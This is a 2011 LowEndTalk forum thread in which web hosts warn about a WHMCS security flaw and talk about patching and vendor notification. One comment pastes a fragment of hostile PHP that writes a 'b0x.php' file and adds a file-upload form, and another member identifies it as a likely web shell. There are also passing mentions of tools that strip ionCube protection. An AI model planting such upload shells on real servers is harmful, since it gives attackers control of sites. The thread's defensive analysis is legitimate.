Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Providers, please update your WHMCS - severe security risk.
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Providers, please update your WHMCS - severe security risk.

cripperzcripperz Member
edited December 2011 in General

Hi guys,

WHMCS got hit again. It causes me not to be able to recover my admin password and password was change unexpectedly.

Please refer to WHMCS forum - http://forum.whmcs.com/showthread.php?p=206522

do update your WHMCS quickly as this is a serious threat.

Comments

  • Thank you, I've just updated my test WHMCS =)

  • rm_rm_ IPv6 Advocate, Veteran
    edited December 2011

    Heh, turns out sometimes it's benificial to use providers with their own custom control panel. :)

  • @rm_ said: Heh, turns out sometimes it's benificial to use providers with their own custom control panel. :)

    What did you mean mate? I think WHMCS is a billing system, not control panel?

  • At one time, I created a huge hosting control panel using CakePHP Framework, but I replaced it with WHMCS because it was AWESOME :)

  • I dont trust whmcs or any other software that hides the code. Could have anything hidden in there. Fortantely tho i have some software that removes ioncube

  • InfinityInfinity Member, Host Rep

    True, but cant you decode it. The people that null the scripts must be able to do so.

  • @DanielM said: Fortantely tho i have some software that removes ioncube

    Would you please share it? :P

  • Thank you for pointing this out as it seems our hosting/license provider failed to mention it :)

  • RensRens Member
    edited December 2011

    Every WHMCS client should have received a mailing about it. This issue seems to be known for a while, there were already people exploiting this in October. Worries me.

  • Yep, every direct WHMCS client does, its down to our provider who issues our WHMCS license (MDD Hosting) to tell us, which they have not.. still.

  • @VMPort said: our hosting/license provider failed to mention it

    Subscribe to the WHMCS twitter feed.

  • @miTgib

    You get my point though right, i shouldnt have to? If a host is providing the license/software they should be informing customers of potential security threats.

    Or am i expecting too much :P

  • They should, but it's your responsibility to keep on top of things too. Relying on someone else is adding one unnecessary point of failure to things.

  • Sure it is, thats why i have done it myself :P I also popped a ticket into MDD telling them i think it would be a good idea to let clients know. Cos im nice :)

  • @Asim said: but I replaced it with WHMCS because it WAS awesome :)

    Fixed :)

    Actually we don't use whmcs so I wouldn't know.

    @VMPort said: You get my point though right, i shouldnt have to? If a host is providing the license/software they should be informing customers of potential security threats.

    Or am i expecting too much :P

    Nope. You just explained my entire line of work. :)

    I do wonder about the October bit up there. I know some of the scripts that we use, once a problem is made public, some times some one will pop out of the woodwork and announce that "Wait, I let you now about that months ago!" and point to a ticket or forum posting or something else.

    That's what concerns me. Seen it with Gallery, wordpress, firefox, windows, etc....

  • Ash_HawkridgeAsh_Hawkridge Member
    edited December 2011

    Just for readings sake... There response.

    We are aware, and was going to announce it but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney
    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

  • @drmike said: Actually we don't use whmcs

    Please don't say you use Platypus still

  • Abacus

  • @VMPort said: Just for readings sake... There response.

    We are aware, and was going to announce it but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney

    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

    From their twitter
    MDDHosting Forums: [Critical] WHMCS Security Update Affecting All Versions http://bit.ly/sycoEx

  • @DanielM
    That's basicly like running nulled software, You don't trust a company that many produces software that many million dollar companys use on a day to day basis.

    Your post is just stupid.

  • @EaseVPS said: That's basicly like running nulled software, You don't trust a company that many produces software that many million dollar companys use on a day to day basis.

    Your post is just stupid.

    Just like Apple tracking their users with secret software, and billions of users...

  • @giang
    That's understandable If they do, They reserve the right to keep there software out of the eyes of the world. If i had spent billions of dollars developing a Operating system and a range of mini portable device(s) I would not want my software to be very easy to decode.

    Every company that develops software should have some callback lines in the code.

  • FranciscoFrancisco Top Host, Host Rep, Veteran

    That's not from this bug, but rather one related to templates/etc back in October.

    Francisco

  • It seems somewhat harmless but I don't see what it's trying to do:

    $fo = fopen("downloads/b0x.php","w");
    fwrite($fo,$code);
    echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!'; } else { echo 'Upload GAGAL !!!'; } } ?>
    

    I'm guessing the form was to upload config files to somewhere listed in downloads/b0x.php?

  • FranciscoFrancisco Top Host, Host Rep, Veteran

    The code would run on the server side, so since /downloads/ is normally 777, the b0x script, likely a phpshell, would dump in there.

    Francisco

  • FranciscoFrancisco Top Host, Host Rep, Veteran

    @DotVPS said: How do i fix it? its whmcs 5?

    I'm guessing WHMCS 5 should have had it included, but I could be wrong.

    Worth logging a ticket with Matt and see what's up. The latest exploit just allows dumping of file contents. If you're on shared hosting this could be a serious problem, but i'd hope you have your billing on a VPS of sorts?

    Francisco

  • FranciscoFrancisco Top Host, Host Rep, Veteran

    You should get a 256MB KVM from us if anything. If you use lighttpd instead of apache you should have no issues keeping up with even huge rushes.

    Francisco

  • InfinityInfinity Member, Host Rep
    edited December 2011

    AFAIK. Stock is coming next year, so about a month or maybe more :P.

  • FranciscoFrancisco Top Host, Host Rep, Veteran

    @Infinity said: AFAIK. Stock is coming next year, so about a month or maybe more :P.

    We'll have some in a week or so depending on how the .32 trials finish off. We just pushed pony7.2 to 99 so we'll see how it goes.

    The kernels have been good without any real issues even under serious load.

    Francisco

    Thanked by 1Infinity
Sign In or Register to comment.